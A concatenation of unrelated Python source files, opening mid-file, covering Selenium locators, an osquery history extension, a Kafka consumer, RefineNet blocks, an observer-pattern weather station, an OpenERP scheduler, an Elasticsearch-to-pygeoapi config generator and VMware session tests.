"//*[@id='auth-customerName-missing-alert']/div/div") EMAIL_ALERT = (By.XPATH, "//*[@id='auth-email-missing-alert']/div/div") INVALID_EMAIL_ALERT = (By.XPATH, "//*[@id='auth-email-invalid-email-alert']/div/div") PASSWORD_ALERT = (By.XPATH, "//*[@id='auth-password-missing-alert']/div/div") SHORT_PASSWORD_ALERT = (By.XPATH, "//*[@id='auth-password-invalid-password-alert']/div/div") RE_PASSWORD_ALERT = (By.XPATH, "//*[@id='auth-passwordCheck-missing-alert']/div/div") MISMATCH_PASSWORD_ALERT = (By.XPATH, "//*[@id='auth-password-mismatch-alert']/div/div") NAME_INPUT = (By.ID, "ap_customer_name") EMAIL_INPUT = (By.ID, "ap_email") PASSWORD_INPUT = (By.ID, "<PASSWORD>") RE_PASSWORD_INPUT = (By.ID, "<PASSWORD>") BOX_PROBLEM_ALERT = (By.XPATH, "//*[@id='auth-error-message-box']/div/h4") # Placeholders are empty ; 
fill invalid email ; fill one password placeholder or different passwords BOX_NAME_ALERT_0 = (By.XPATH, "//*[@id='auth-error-message-box']/div/div/dl/li[1]/span") BOX_EMAIL_ALERT_0 = (By.XPATH, "//*[@id='auth-error-message-box']/div/div/dl/li[2]/span") BOX_PASSWORD_ALERT_0 = (By.XPATH, "//*[@id='auth-error-message-box']/div/div/dl/li[3]/span") # Name placeholder is fill BOX_EMAIL_ALERT_1 = (By.XPATH, "//*[@id='auth-error-message-box']/div/div/dl/li[1]/span") BOX_PASSWORD_ALERT_1 = (By.XPATH, "//*[@id='auth-error-message-box']/div/div/dl/li[2]/span") class LoginPageLocators: SIGN_IN = (By.XPATH, "//*[@id='nav-flyout-ya-signin']/a") EMAIL_PHONE_INPUT = (By.ID, "ap_email") EMPTY_EMAIL_PHONE = (By.XPATH, "//*[@id='auth-email-missing-alert']/div/div") EMAIL_PHONE_ALERT = (By.XPATH, "//*[@id='auth-error-message-box']/div/div/ul/li/span") CONTINUE_BUTTON = (By.ID, "continue") CREATE_ACC_BUTTON = (By.ID, "createAccountSubmit") NEED_HELP_LINK = (By.XPATH, "//*[@id='authportal-main-section']/div[2]/div/div[1]/form/div/div/div/div[3]/div/a/span") FORGOT_PASS_LINK = (By.ID, "auth-fpp-link-bottom") OTHER_ISSUES_LINK = (By.ID, "ap-other-signin-issues-link") VALID_EMAIL = (By.XPATH, "//*[@id='authportal-main-section']/div[2]/div/div/div/div/span") FORGOT_PASS_SITE = (By.XPATH, "//*[@id='authportal-main-section']/div[2]/div/div[1]/div/form/h1") OTHER_ISSUES_SITE = (By.XPATH, "//*[@id='a-page']/div[2]/div[1]/h1") CREATE_ACC_SITE = (By.XPATH, "//*[@id='ap_register_form']/div/div/h1") import xml.etree.ElementTree as et import json import subprocess import pathlib import os try: from AtmlReader.AtmlTestResults import AtmlTestResults except: from AtmlTestResults import AtmlTestResults class AtmlFile(object): def __init__(self, file_path): file_handle = None root = None namespace_dict = {"trc":"urn:IEEE-1636.1:2011:01:TestResultsCollection", "tr":"urn:IEEE-1636.1:2011:01:TestResults", "c":"urn:IEEE-1671:2010:Common", "xsi":"http://www.w3.org/2001/XMLSchema-instance", "ts":"www.ni.com/TestStand/ATMLTestResults/2.0"} file_handle = open(file_path, encoding="utf8") root = et.fromstring(file_handle.read()) self.test_results = AtmlTestResults(root, namespace_dict) if file_handle != None: file_handle.close() def to_json(self): return f'{{ "testResults": {self.test_results.to_json()} }}' def __repr__(self): return self.to_json() if __name__ == "__main__": atml_file_path = r'C:\repos\battery-tester\Cycle Test\Battery Cycle Test_Report[3 22 37 PM][2 5 2020].xml' atml_file = AtmlFile(atml_file_path) atml_file_string = atml_file.to_json() with open(r'C:\Users\rfriedma\AppData\Local\Temp\atml_file.json', 'w') as f: f.write(atml_file_string) atml_json = json.loads(atml_file_string) <reponame>devborz/osquery_extension import json import osquery from os.path import expanduser @osquery.register_plugin class FilesystemHistoryTablePlugin(osquery.TablePlugin): def name(self): return "filesystem_history" def columns(self): return [ osquery.TableColumn(name="Time", type=osquery.STRING), osquery.TableColumn(name="Path", type=osquery.STRING), osquery.TableColumn(name="Filename", type=osquery.STRING), ] def generate(self, context): query_data = [] home = expanduser("~") input_file = open(home+'/fs_history.json') json_array = json.load(input_file) for item in json_array: row = {} row["Time"] = item['time'] row["Path"] = item['path'] row["Filename"] = item['filename'] query_data.append(row) return query_data @osquery.register_plugin class BashHistoryTablePlugin(osquery.TablePlugin): def name(self): return "bash_history" def 
columns(self): return [ osquery.TableColumn(name="Time", type=osquery.STRING), osquery.TableColumn(name="Execute directory", type=osquery.STRING), osquery.TableColumn(name="Command", type=osquery.STRING), ] def generate(self, context): query_data = [] home = expanduser("~") input_file = open(home +'/bash_history.json') json_array = json.load(input_file) for item in json_array: row = {} row["Time"] = item['time'] row["Execute directory"] = item['path'] row["Command"] = item['command'] query_data.append(row) return query_data @osquery.register_plugin class VimCommandlineHistoryTablePlugin(osquery.TablePlugin): def name(self): return "vim_commandline_history" def columns(self): return [ osquery.TableColumn(name="Time", type=osquery.STRING), osquery.TableColumn(name="Command", type=osquery.STRING), ] def generate(self, context): query_data = [] home = expanduser("~") input_file = open(home +'/vim_cmd_history.json') json_array = json.load(input_file) for item in json_array: row = {} row["Time"] = item['time'] row["Command"] = item['command'] query_data.append(row) return query_data @osquery.register_plugin class vimFileMarksHistoryTablePlugin(osquery.TablePlugin): def name(self): return "vim_filemarks_history" def columns(self): return [ osquery.TableColumn(name="Time", type=osquery.STRING), osquery.TableColumn(name="File's path", type=osquery.STRING), osquery.TableColumn(name="Filename", type=osquery.STRING), osquery.TableColumn(name="Position row", type=osquery.STRING), osquery.TableColumn(name="Position column", type=osquery.STRING) ] def generate(self, context): query_data = [] home = expanduser("~") input_file = open(home +'/vim_fm_history.json') json_array = json.load(input_file) for item in json_array: row = {} row["Time"] = item['time'] row["File's path"] = item['path'] row["Filename"] = item['filename'] row["Position row"] = item['row'] row["Position column"] = item['column'] query_data.append(row) return query_data if __name__ == "__main__": osquery.start_extension(name="history", version="1.0.0") <filename>src/modelo/album.py import enum from sqlalchemy import Column, Integer, String, Enum from sqlalchemy.orm import relationship from .declarative_base import Base class Medio(enum.Enum): DISCO = 1 CASETE = 2 CD = 3 class Album(Base): __tablename__ = 'album' id = Column(Integer, primary_key=True) titulo = Column(String) ano = Column(Integer) descripcion = Column(String) medio = Column(Enum(Medio)) canciones = relationship('Cancion', secondary='album_cancion', back_populates="albumes") import confluent_kafka import logging from confluent_kafka import Consumer from typing import Any, List, Optional, Union _logger = logging.getLogger(__name__) DEFAULT_QUEUED_MAX_MESSAGES_KBYTES = 10000 class KafkaMessageWrapper: def __init__(self, raw_msg: confluent_kafka.cimpl.Message): assert raw_msg is not None, "Raw message cannot be None." self._raw_msg = raw_msg def value(self) -> Union[str, bytes, bytearray]: return self._raw_msg.value() def topic(self) -> str: return self._raw_msg.topic() def partition(self) -> int: return self._raw_msg.partition() def offset(self) -> int: return self._raw_msg.offset() class KafkaConsumer: """ A wrapper for a Kafka Consumer. Currently uses the confluent kafka implementation. 
Future Note: As this project is supposed to run on Raspberry Pi (which I have not yet had time to test) we may need to switch this to use the python kafka library: https://github.com/dpkp/kafka-python As this is implemented natively in Python it may represent a lower hurdle for getting this application running on a pi. """ def __init__( self, id: str, topics: List[str], brokers: str, offset_reset_to_latest: bool = True, ): consumer_config = { "bootstrap.servers": brokers, "group.id": "scrapworker-" + id, "auto.offset.reset": "latest" if offset_reset_to_latest else "earliest", "enable.auto.commit": False, "queued.max.messages.kbytes": DEFAULT_QUEUED_MAX_MESSAGES_KBYTES, } _logger.debug(f"Kafka Consumer Config: {consumer_config}") self._consumer = Consumer(consumer_config) # subscribe to topic self._debug(f"Subscribing to topics: {str(topics)}") self._consumer.subscribe(topics) self._assignment: List[Any] = [] def _debug(self, msg: str): _logger.debug(f"{msg}") def __enter__(self): return self def __exit__(self, exc_type, exc_value, traceback): self._consumer.close() def commit(self): self._consumer.commit() def get_assignment(self): return self._consumer.assignment() def consume( self, ms: int = 500, wait_for_assignment: bool = False ) -> Optional[KafkaMessageWrapper]: """ Consumes a message from the kafka topic supplied in the constructor. optional: ms: The timeout, in seconds, to wait for a message. None is returned if no messages are consumed. wait_for_assignment: Will block until the consumer has established a connection with the broker and received at least one partition/offset assignment. """ msg = self._consumer.poll(ms / 1000) # The confluent consumer doesn't block on the constructor or poll (with timeout) # while it's connecting to the broker. In some cases, like where we're both a # producer and a consumer, we need to know that the consumer has been assigned # a partition and offset so we can begin producing. # The loop also breaks if msg is not None because if we got a message we # must have an assignment. # TODO: Need to set a timeout for this as well. while wait_for_assignment and msg is None and len(self._assignment) == 0: self._debug("Waiting for topic assignment.") self._assignment = self._consumer.assignment() msg = self._consumer.poll(ms / 1000) return None if msg is None else KafkaMessageWrapper(raw_msg=msg) <filename>python/exercicios mundo 1/ex005/ex001.py #manipulaçao de texto(onde o 3 é o inicio e o 13 e o fim uma casa antes) #isso e chamado de FATIAMENTO. 
frase = 'curso em video python' print(frase[3:13]) <reponame>ldept/University #!/usr/bin/env python3 import random import sys if __name__ == '__main__': nelem = int(sys.argv[1]) print(nelem) for i in range(nelem): print(random.randint(-nelem * 10, nelem * 10)) import streamlit as st from PIL import Image header = st.beta_container() description = st.beta_container() user_inputs = st.beta_container() with header: header.title("Remote Radiologist") # with description: # description.subheader("Project Description") # description.text("Write the Project Description Here!!!") with user_inputs: user_col, display_col = st.beta_columns(spec=2) uploaded_file = st.file_uploader("Upload Image", type=['png', 'jpg', 'pdf', 'jpeg']) if uploaded_file is not None: image = Image.open(uploaded_file) st.image(image, caption='Uploaded Image.', use_column_width=True) # labels = {'Covid%': 35, 'XYZ': 35, 'ABC': 30} labels = {} # call the predictor here for key, value in labels.items(): st.write(key + " : " + str(value)) class Subject: """Class for representing a subject for observers to subscribe to""" def register_observer(self, observer): """Regisures an observer to the subject""" def remove_observer(self, observer): """Removes an observer from subscribing to the subject""" def notify_observers(self): """Notifys all subscribed observers that the subject has updated""" # The observer class is implemented by all observers, # so they all have to implemented the update() method. Here # we're following Mary and Sue's lead and # passing the measurements to the observers. class Observer: """Class representation of an observer for staying up to date on a subject""" def update(self, temp, humidity, pressure): """Updates the value that the observer watches""" self.temperature = temp self.humidity = humidity self.pressure = pressure self.display() def display(self): """Displays the dispays observers information""" # weather_data now implements the subject interface. class WeatherData(Subject): """Class representation of the weather data subject""" def __init__(self): """Creates a new WeatherData object""" self.observers = [] self.temperature = 0 self.humidity = 0 self.pressure = 0 def register_observer(self, observer): """When an observer registers, we just add it to the end of the list.""" self.observers.append(observer) def remove_observer(self, observer): """When an observer wants to un-register, we just take it off the list.""" self.observers.remove(observer) def notify_observers(self): """We notify the observers when we get updated measurements from the Weather Station.""" for ob in self.observers: ob.update(self.temperature, self.humidity, self.pressure) def measurements_changed(self): """Idicates that the observers need to me updated""" self.notify_observers() def set_measurements(self, temperature, humidity, pressure): """Sets the weather datas measurements to the given measurements""" self.temperature = temperature self.humidity = humidity self.pressure = pressure self.measurements_changed() class CurrentConditionsDisplay(Observer): """Class representation of a current condition dispaly""" def __init__(self, weather_data): """Creates a new CurrentConditionsDispaly object""" self.temperature = 0 self.humidity = 0 self.pressure = 0 self.weather_data = weather_data # save the ref in an attribute. weather_data.register_observer(self) # register the observer # so it gets data updates. 
def display(self): """Displays the current conditions""" print("Current conditions:", self.temperature, "F degrees and", self.humidity,"[%] humidity", "and pressure", self.pressure) print("========================") # implement StatisticsDisplay class and ForecastDisplay class. class StatisticsDisplay(Observer): """Class representation of a statistics display""" def __init__(self, weather_data): """Creats a new StatisitcDispaly object that observes the given weather data subject""" self.temperature = 0 self.temperatures = [] self.humidity = 0 self.humidities = [] self.pressure = 0 self.pressures = [] self.weather_data = weather_data weather_data.register_observer(self) def update(self, temp, humidity, pressure): """Updates the displays measurements and dispalys them""" self.temperatures.append(self.temperature) self.temperature = temp self.humidities.append(self.humidity) self.humidity = humidity self.pressures.append(self.pressure) self.pressure = pressure self.display() def display(self): """Displays the average, min, and max measurements""" print("Statistics") print(f"Average Temp: {sum(self.temperatures)/len(self.temperatures)}") print(f"Max Temp: {max(self.temperatures)}") print(f"Min Temp: {min(self.temperatures)}") print(f"Average Humidity: {sum(self.humidities)/len(self.humidities)}") print(f"Max Humidity: {max(self.humidities)}") print(f"Min Humidity: {min(self.humidities)}") print(f"Average Pressure: {sum(self.pressures)/len(self.pressures)}") print(f"Max Pressure: {max(self.pressures)}") print(f"Min Pressure: {min(self.pressures)}") print("========================") class ForecastDisplay(Observer): """Class representation of a forcast display""" def __init__(self, weather_data): """Creates a new ForcastDispaly object""" self.temperature = 0 self.humidity = 0 self.pressure = 0 self.weather_data = weather_data weather_data.register_observer(self) def display(self): """Dispalys the forcasts temp, humidity, and pressure""" print("Forcast") print(f"Temperature: {self.temperature + 0.11 * self.humidity + 0.2 * self.pressure}") print(f"Humidity: {self.humidity - 0.9 * self.humidity}") print(f"Pressure: {self.pressure + 0.1 * self.temperature - 0.21 * self.pressure}") print("========================") class WeatherStation: """Class representation of the weather station""" def main(self): """Creates a new WeatherStation object""" weather_data = WeatherData() current_display = CurrentConditionsDisplay(weather_data) statistics_display = StatisticsDisplay(weather_data) forecast_display = ForecastDisplay(weather_data) # Create two objects from StatisticsDisplay class and # ForecastDisplay class. Also, register them to the concrete instance # of the Subject class so they get the measurements' updates. # The StatisticsDisplay class should keep track of the min/average/max # measurements and display them. # The ForecastDisplay class shows the weather forecast based on the current # temperature, humidity and pressure. 
Use the following formulas : # forcast_temp = temperature + 0.11 * humidity + 0.2 * pressure # forcast_humadity = humidity - 0.9 * humidity # forcast_pressure = pressure + 0.1 * temperature - 0.21 * pressure weather_data.set_measurements(80, 65,30.4) weather_data.set_measurements(82, 70,29.2) weather_data.set_measurements(78, 90,29.2) # un-register the observers weather_data.remove_observer(current_display) weather_data.remove_observer(statistics_display) weather_data.remove_observer(forecast_display) weather_data.set_measurements(120, 100,1000) if __name__ == "__main__": w = WeatherStation() w.main() <filename>models/RefineNet/blocks.py import torch.nn as nn ''' [description] RCU block ''' class ResidualConvUnit(nn.Module): def __init__(self, features): super().__init__() self.conv1 = nn.Conv2d( features, features, kernel_size=3, stride=1, padding=1, bias=True) self.conv2 = nn.Conv2d( features, features, kernel_size=3, stride=1, padding=1, bias=False) self.relu = nn.ReLU(inplace=True) def forward(self, x): out = self.relu(x) out = self.conv1(out) out = self.relu(out) out = self.conv2(out) return out + x ''' [description] ''' class MultiResolutionFusion(nn.Module): def __init__(self, out_feats, *shapes): super().__init__() _, max_size = max(shapes, key=lambda x: x[1]) # get the maxer shape of several input feture maps self.max_size = (max_size, max_size) self.scale_factors = [] for i, shape in enumerate(shapes): feat, size = shape # if max_size % size != 0: # raise ValueError("max_size not divisble by shape {}".format(i)) # self.scale_factors.append(max_size // size) self.add_module( "resolve{}".format(i), nn.Conv2d( feat, out_feats, kernel_size=3, stride=1, padding=1, bias=False)) def forward(self, *xs): # print(self.max_size) max_size = self.max_size#xs[-1].size()[-2:] # max size of these feature, in default situation, the last data in the data-array has the biggest shape output = self.resolve0(xs[0]) if xs[0].size()[-2] != max_size[0]: output = nn.functional.interpolate( output, size=max_size, mode='bilinear', align_corners=True) for i, x in enumerate(xs[1:], 1): this_feature = self.__getattr__("resolve{}".format(i))(x) # upsamples all (smaller) feature maps to the largest resolution of the inputs if xs[i].size()[-2] != max_size[0]: this_feature = nn.functional.interpolate( this_feature, size=max_size, mode='bilinear', align_corners=True) output += this_feature return output ''' [description] chained residual pool ''' class ChainedResidualPool(nn.Module): def __init__(self, feats): super().__init__() self.relu = nn.ReLU(inplace=True) # two pool-block for i in range(1, 3): self.add_module( "block{}".format(i), nn.Sequential( nn.MaxPool2d(kernel_size=5, stride=1, padding=2), # obtain the raw feature map size nn.Conv2d( feats, feats, kernel_size=3, stride=1, padding=1, bias=False))) def forward(self, x): x = self.relu(x) path = x for i in range(1, 3): path = self.__getattr__("block{}".format(i))(path) x = x + path return x class ChainedResidualPoolImproved(nn.Module): def __init__(self, feats): super().__init__() self.relu = nn.ReLU(inplace=True) for i in range(1, 5): self.add_module( "block{}".format(i), nn.Sequential( nn.Conv2d( feats, feats, kernel_size=3, stride=1, padding=1, bias=False), nn.MaxPool2d(kernel_size=5, stride=1, padding=2))) def forward(self, x): x = self.relu(x) path = x for i in range(1, 5): path = self.__getattr__("block{}".format(i))(path) x += path return x class BaseRefineNetBlock(nn.Module): def __init__(self, features, residual_conv_unit, multi_resolution_fusion, 
chained_residual_pool, *shapes): super().__init__() for i, shape in enumerate(shapes): feats = shape[0] # channel-num of this stage's output feature map self.add_module( "rcu{}".format(i), nn.Sequential( residual_conv_unit(feats), residual_conv_unit(feats))) # stage-4 of ResNet needn't have to use 'multi_resolution_fusion' if len(shapes) != 1: self.mrf = multi_resolution_fusion(features, *shapes) else: self.mrf = None self.crp = chained_residual_pool(features) self.output_conv = residual_conv_unit(features) def forward(self, *xs): rcu_xs = [] # multi-resolution input fusion for i, x in enumerate(xs): rcu_xs.append(self.__getattr__("rcu{}".format(i))(x)) # Multi-resolution Fusion if self.mrf is not None: out = self.mrf(*rcu_xs) else: out = rcu_xs[0] # Chained Residual Pooling out = self.crp(out) # Output Conv. return self.output_conv(out) class RefineNetBlock(BaseRefineNetBlock): def __init__(self, features, *shapes): super().__init__(features, ResidualConvUnit, MultiResolutionFusion, ChainedResidualPool, *shapes) class RefineNetBlockImprovedPooling(nn.Module): def __init__(self, features, *shapes): super().__init__(features, ResidualConvUnit, MultiResolutionFusion, ChainedResidualPoolImproved, *shapes) class MMFBlock(nn.Module): def __init__(self, features): super(MMFBlock, self).__init__() self.downchannel = features // 2 self.relu = nn.ReLU(inplace=True) self.rgb_feature = nn.Sequential( nn.Conv2d(features, self.downchannel, kernel_size=1, stride=1, padding=0, bias=False), # downsample # nonlinear_transformations ResidualConvUnit(self.downchannel), ResidualConvUnit(self.downchannel), nn.Conv2d(self.downchannel, features, kernel_size=3, stride=1, padding=1, bias=False) # upsample ) self.hha_feature = nn.Sequential( nn.Conv2d(features, self.downchannel, kernel_size=1, stride=1, padding=0, bias=False), # downsample # nonlinear_transformations ResidualConvUnit(self.downchannel), ResidualConvUnit(self.downchannel), nn.Conv2d(self.downchannel, features, kernel_size=3, stride=1, padding=1, bias=False) # upsample ) self.ResidualPool = nn.Sequential( nn.MaxPool2d(kernel_size=5, stride=1, padding=2), # obtain the raw feature map size nn.Conv2d( features, features, kernel_size=3, stride=1, padding=1, bias=False)) def forward(self, rgb, hha): rgb_fea = self.rgb_feature(rgb) hha_fea = self.hha_feature(hha) fusion = self.relu(rgb_fea + hha_fea) x = self.ResidualPool(fusion) return fusion + x<reponame>dtienq/crawl-shop<gh_stars>0 # coding=utf-8 from .product import Product from ..base.base import session_factory session = session_factory()# Copyright 2018 The Chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. 
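# --- Added usage sketch (not part of the original sources in this dump) ---
# A minimal, hypothetical example of wiring up the RefineNet building blocks
# defined above (ResidualConvUnit, MultiResolutionFusion, ChainedResidualPool,
# RefineNetBlock). It assumes RefineNetBlock from the blocks module above is
# importable/in scope; the channel counts and spatial sizes are illustrative
# assumptions, not values taken from the original repository.
import torch

features = 256
# Fuse a deep 8x8 / 512-channel feature map with a shallower 16x16 / 256-channel map.
# Each shape tuple is (channels, spatial_size), matching MultiResolutionFusion's expectations.
refine_block = RefineNetBlock(features, (512, 8), (256, 16))
x_deep = torch.randn(1, 512, 8, 8)
x_shallow = torch.randn(1, 256, 16, 16)
# Both inputs pass through their RCU stacks, are projected to `features` channels,
# upsampled to the larger resolution, summed, pooled, and refined once more.
fused = refine_block(x_deep, x_shallow)  # expected shape: (1, 256, 16, 16)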
DEPS = [ 'osx_sdk', 'recipe_engine/platform', 'recipe_engine/properties', 'recipe_engine/step', ] def RunSteps(api): with api.osx_sdk('mac'): api.step('gn', ['gn', 'gen', 'out/Release']) api.step('ninja', ['ninja', '-C', 'out/Release']) def GenTests(api): for platform in ('linux', 'mac', 'win'): yield (api.test(platform) + api.platform.name(platform)) <gh_stars>1-10 from nes.processors.registers import Register class PpuMask(Register): """ 7 bit 0 ---- ---- BGRs bMmG |||| |||| |||| |||+- Greyscale (0: normal color, 1: produce a greyscale display) |||| ||+-- 1: Show background in leftmost 8 pixels of screen, 0: Hide |||| |+--- 1: Show sprites in leftmost 8 pixels of screen, 0: Hide |||| +---- 1: Show background |||+------ 1: Show sprites ||+------- Emphasize red |+-------- Emphasize green +--------- Emphasize blue """ def __init__(self, data=0): self.data = data @property def value(self): return self.data @value.setter def value(self, value): self.data = value @property def grayscale(self): return self.data & 0x01 @property def show_background_in_leftmost_8_pixels(self): return self.data & 0x02 @property def show_sprites_in_leftmost_8_pixels(self): return self.data & 0x04 @property def show_background(self): return self.data & 0x08 @property def show_sprites(self): return self.data & 0x10 @property def emphasize_red(self): return self.data & 0x20 @property def emphasize_green(self): return self.data & 0x40 @property def emphasize_blue(self): return self.data & 0x80 # -*- coding: utf-8 -*- ############################################################################## # # OpenERP, Open Source Management Solution # Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>). # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU Affero General Public License as # published by the Free Software Foundation, either version 3 of the # License, or (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU Affero General Public License for more details. # # You should have received a copy of the GNU Affero General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. # ############################################################################## import logging import threading from openerp import SUPERUSER_ID from openerp import tools from openerp.osv import osv from openerp.api import Environment _logger = logging.getLogger(__name__) class procurement_compute_all(osv.osv_memory): _name = 'procurement.order.compute.all' _description = 'Compute all schedulers' def _procure_calculation_all(self, cr, uid, ids, context=None): """ @param self: The object pointer. 
@param cr: A database cursor @param uid: ID of the user currently logged in @param ids: List of IDs selected @param context: A standard dictionary """ with Environment.manage(): proc_obj = self.pool.get('procurement.order') #As this function is in a new thread, i need to open a new cursor, because the old one may be closed new_cr = self.pool.cursor() scheduler_cron_id = self.pool['ir.model.data'].get_object_reference(new_cr, SUPERUSER_ID, 'procurement', 'ir_cron_scheduler_action')[1] # Avoid to run the scheduler multiple times in the same time try: with tools.mute_logger('openerp.sql_db'): new_cr.execute("SELECT id FROM ir_cron WHERE id = %s FOR UPDATE NOWAIT", (scheduler_cron_id,)) except Exception: _logger.info('Attempt to run procurement scheduler aborted, as already running') new_cr.rollback() new_cr.close() return {} user = self.pool.get('res.users').browse(new_cr, uid, uid, context=context) comps = [x.id for x in user.company_ids] for comp in comps: proc_obj.run_scheduler(new_cr, uid, use_new_cursor=new_cr.dbname, company_id = comp, context=context) #close the new cursor new_cr.close() return {} def procure_calculation(self, cr, uid, ids, context=None): """ @param self: The object pointer. @param cr: A database cursor @param uid: ID of the user currently logged in @param ids: List of IDs selected @param context: A standard dictionary """ threaded_calculation = threading.Thread(target=self._procure_calculation_all, args=(cr, uid, ids, context)) threaded_calculation.start() return {'type': 'ir.actions.act_window_close'} # vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4: from django.db import models # Create your models here. class Installation(models.Model): name = models.CharField(max_length=255) installed = models.BooleanField(default=True) created_on = models.DateTimeField(auto_now_add=True)#!/usr/bin/python3 import configparser from elasticsearch import Elasticsearch # Main Function def main(): auth = get_config_params('config.ini') # es = Elasticsearch() es = Elasticsearch([auth.get('es', 'es_endpoint')], http_auth=(auth.get('es', 'es_un'), auth.get('es', 'es_pw'))) config = """# ================================================================= # # Authors: <NAME> <<EMAIL>> # # Copyright (c) 2020 <NAME> # # Permission is hereby granted, free of charge, to any person # obtaining a copy of this software and associated documentation # files (the "Software"), to deal in the Software without # restriction, including without limitation the rights to use, # copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the # Software is furnished to do so, subject to the following # conditions: # # The above copyright notice and this permission notice shall be # included in all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, # EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES # OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND # NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT # HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, # WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING # FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR # OTHER DEALINGS IN THE SOFTWARE. 
# # ================================================================= server: bind: host: 0.0.0.0 port: 5000 url: http://localhost:5000 mimetype: application/json; charset=UTF-8 encoding: utf-8 language: en-US # cors: true pretty_print: true limit: 10 # templates: # path: /path/to/Jinja2/templates # static: /path/to/static/folder # css/js/img map: url: 'http://{s}.tile.osm.org/{z}/{x}/{y}.png' attribution: '© <a href="http://osm.org/copyright">OpenStreetMap</a> contributors, Points © 2012 LINZ' # manager: # name: TinyDB # connection: /tmp/pygeoapi-process-manager.db # output_dir: /tmp/ # ogc_schemas_location: /opt/schemas.opengis.net logging: level: ERROR # logfile: /tmp/pygeoapi.log metadata: identification: title: OpenDRR Web Feature Service description: Developer API for geospatial data provided by the OpenDRR platform. keywords: - land management - sustainable development - planning - natural disasters keywords_type: theme terms_of_service: http://open.canada.ca/en/open-government-licence-canada/ url: https://opendrr.github.io/ license: name: Open Government Licence - Canada url: http://open.canada.ca/en/open-government-licence-canada/ provider: name: Government of Canada; Natural Resources Canada; Lands and Minerals Sector, Geological Survey of Canada url: https://www.nrcan.gc.ca/ contact: name: <NAME> position: Project Manager address: 1500 - 605 Robson Street city: Vancouver stateorprovince: British Columbia postalcode: V6B 5J3 country: Canada phone: +01-604-666-0529 fax: +01-604-666-1124 email: <EMAIL> url: https://www.nrcan.gc.ca/ hours: Mo-Fr 08:30-16:30 instructions: During hours of service. Off on weekends. role: pointOfContact resources:\n\n""" snippet = """{0}: type: collection title: {1} description: {2} keywords: - earthquake links: - type: text/html rel: canonical title: information href: http://www.riskprofiler.ca/ hreflang: en-US extents: spatial: bbox: [-141.003,41.6755,-52.6174,83.1139] crs: http://www.opengis.net/def/crs/OGC/1.3/CRS84 temporal: begin: 2020-08-06 end: null # or empty (either means open ended) providers: - type: feature name: Elasticsearch data: """ + auth.get('es', 'es_endpoint') + """/{3} id_field: {4}""" text_file = open("../pygeoapi/opendrr.config.yml", "w") id_field = "AssetID" indices = es.indices.get('*') indices = sorted(indices) for index in indices: if (index[0] == '.'): continue if index[-2:] == "_s": id_field = "Sauid" config += " " + snippet.format(index, index, index, index, id_field) + "\n\n" text_file.write(config) text_file.close() def get_config_params(args): """ Parse Input/Output columns from supplied *.ini file """ configParseObj = configparser.ConfigParser() configParseObj.read(args) return configParseObj if __name__ == '__main__': main() <reponame>matthewbush55/python-newsfeed from .home import bp_home as home from .dashboard import bp_dashboard as dashboard from .api import bp_api as api from page_objects.home_page import HomePage from setup.setup import UITest class TestHomePage(UITest): def test_page_load(self): home_page = HomePage(self.driver).open() assert home_page.is_page_loaded() def test_mit_page_link(self): home_page = HomePage(self.driver).open() mit_license_page = home_page.open_mit_license_page() assert mit_license_page.is_page_loaded() <reponame>huadream/networking-vsphere # Copyright (c) 2014 Hewlett-Packard Development Company, L.P. # All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. 
You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. import mock from oslo_vmware import api from oslo_vmware import vim from networking_vsphere.tests import base from networking_vsphere.utils import vim_session class TestVmwareApiSession(base.TestCase): def setUp(self): super(TestVmwareApiSession, self).setUp() self.host_ip = "192.168.1.3" self.host_username = "user" self.host_password = "password" self.api_retry_count = 2 self.wsdl_url = "fake_url" self.ca_cert = "fake_cert" self.connection_timeout = 120 self.vm_session = vim_session.VMWareAPISession(self.host_ip, self.host_username, self.host_password, self.api_retry_count, self.wsdl_url, self.ca_cert, self.connection_timeout, create_session=False) @mock.patch.object(api.VMwareAPISession, "invoke_api") def test_call_method(self, mock_invoke_ob): with mock.patch.object(self.vm_session, "_is_vim_object", return_value=True): self.vm_session._call_method("fake_module", "get_objects", "HostSystem", ['name']) self.assertTrue(mock_invoke_ob.called) @mock.patch.object(api.VMwareAPISession, "invoke_api") @mock.patch.object(api.VMwareAPISession, "vim") def test_call_method_with_vim_object_false(self, mock_vim_prop, mock_invoke_ob): vim.Vim = mock.Mock() mock_vim_prop.return_value = vim.Vim with mock.patch.object(self.vm_session, "_is_vim_object", return_value=False): self.vm_session._call_method("fake_module", "get_objects", "HostSystem", ['name']) self.assertTrue(mock_invoke_ob.called) @mock.patch.object(api.VMwareAPISession, "vim") def test_get_vim(self, mock_vim_prop): vim.Vim = mock.Mock(return_value="fake_vim") mock_vim_prop.return_value = vim.Vim new_vim = self.vm_session._get_vim() self.assertEqual(new_vim, self.vm_session.vim) class TestConnectionHandler(base.TestCase): def setUp(self): super(TestConnectionHandler, self).setUp() self.host_ip = "192.168.1.3" self.host_username = "user" self.host_password = "password" self.api_retry_count = 2 self.wsdl_url = "fake_url" self.ca_cert = 'fake_cert' self.connection_timeout = 120 def test_create_connection(self): vim_session.ConnectionHandler.set_vc_details(self.host_ip, self.host_username, self.host_password, self.api_retry_count, self.wsdl_url, self.ca_cert, self.connection_timeout) 